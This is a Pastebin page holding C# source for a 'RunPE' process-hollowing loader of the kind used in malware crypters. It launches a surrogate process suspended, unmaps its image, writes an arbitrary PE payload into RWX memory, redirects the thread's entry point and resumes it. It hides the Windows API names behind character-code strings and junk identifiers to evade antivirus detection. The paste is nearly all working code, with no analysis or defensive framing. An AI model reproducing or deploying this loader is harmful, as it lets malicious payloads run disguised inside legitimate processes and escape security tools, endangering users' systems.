API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 30th, 2017
108
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.72 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Data;
  4. using System.Drawing;
  5. using System.Text;
  6. using System.IO;
  7. using System.Runtime.InteropServices;
  8. using System.Resources;
  9. using System.Security.Cryptography;
  10. using System.Reflection;
  11. using Microsoft.Win32;
  12.  
  13. namespace RUNPE
  14. {
  15. public class FLYPATHTONORWAY1
  16. {
  17. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  18. internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
  19. [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  20. static extern IntPtr DEALER122(IntPtr hModule, string procName);
  21. delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
  22. delegate bool EXT(IntPtr hThr, uint[] ctxt);
  23. delegate bool TEX(IntPtr t, uint[] c); //all kernel32
  24. delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
  25. delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
  26. delegate uint EAD(IntPtr hThread); //kernel32.dll
  27. delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
  28. delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
  29. delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
  30. delegate bool OP(byte[] bytes, string surrogateProcess);
  31.  
  32. public T TEXTFILEFAS43DASF<T>(string name, string method)
  33. {
  34. return (T)(object)Marshal.GetDelegateForFunctionPointer(DEALER122(LoadLibraryA(name), method), typeof(T));
  35. }
  36. public static bool AVcsCDXSAD425A(byte[] bytes, string surrogateProcess)
  37. {
  38. FLYPATHTONORWAY1 p = new FLYPATHTONORWAY1();
  39. OP F1 = new OP(p.FLYPATHTOLASVEGAZ1);
  40. bool Res = F1(bytes, surrogateProcess);
  41. return Res;
  42. }
  43. public bool FLYPATHTOLASVEGAZ1(byte[] bytes, string surrogateProcess)
  44. {
  45. String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
  46. String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
  47. ESS CP = TEXTFILEFAS43DASF<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
  48. ION NUVS = TEXTFILEFAS43DASF<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
  49. EXT GTC = TEXTFILEFAS43DASF<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  50. TEX STC = TEXTFILEFAS43DASF<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  51. ORY RPM = TEXTFILEFAS43DASF<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  52. EAD RT = TEXTFILEFAS43DASF<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
  53. CEX VAE = TEXTFILEFAS43DASF<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
  54. CTEX VPE = TEXTFILEFAS43DASF<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
  55. MOR WPM = TEXTFILEFAS43DASF<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  56. try
  57. {
  58. IntPtr procAttr = IntPtr.Zero;
  59. IntPtr[] processInfo = new IntPtr[4];
  60. byte[] startupInfo = new byte[0x44];
  61. int num2 = BitConverter.ToInt32(bytes, 60);
  62. int num = BitConverter.ToInt16(bytes, num2 + 6);
  63. IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
  64. if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
  65. {
  66. uint[] ctxt = new uint[0xb3];
  67. ctxt[0] = 0x10002;
  68. if (GTC(processInfo[1], ctxt))
  69. {
  70. IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
  71. IntPtr buffer = IntPtr.Zero;
  72. IntPtr bufferSize = new IntPtr(4);
  73. IntPtr numRead = IntPtr.Zero;
  74. if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
  75. {
  76. IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
  77. IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
  78. IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
  79. int lpNumberOfBytesWritten;
  80. WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
  81. int num5 = num - 1;
  82. for (int i = 0; i <= num5; i++)
  83. {
  84. int[] dst = new int[10];
  85. Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
  86. byte[] buffer2 = new byte[(dst[4] - 1) + 1];
  87. Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
  88. size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
  89. addr = new IntPtr(buffer2.Length);
  90. WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
  91. }
  92. size = new IntPtr(ctxt[0x29] + 8L);
  93. addr = new IntPtr(4);
  94. WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
  95. ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
  96. STC(processInfo[1], ctxt);
  97. }
  98. }
  99. RT(processInfo[1]);
  100. }
  101. }
  102. catch
  103. {
  104. return false;
  105. }
  106. return true;
  107. }
  108. }
  109. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!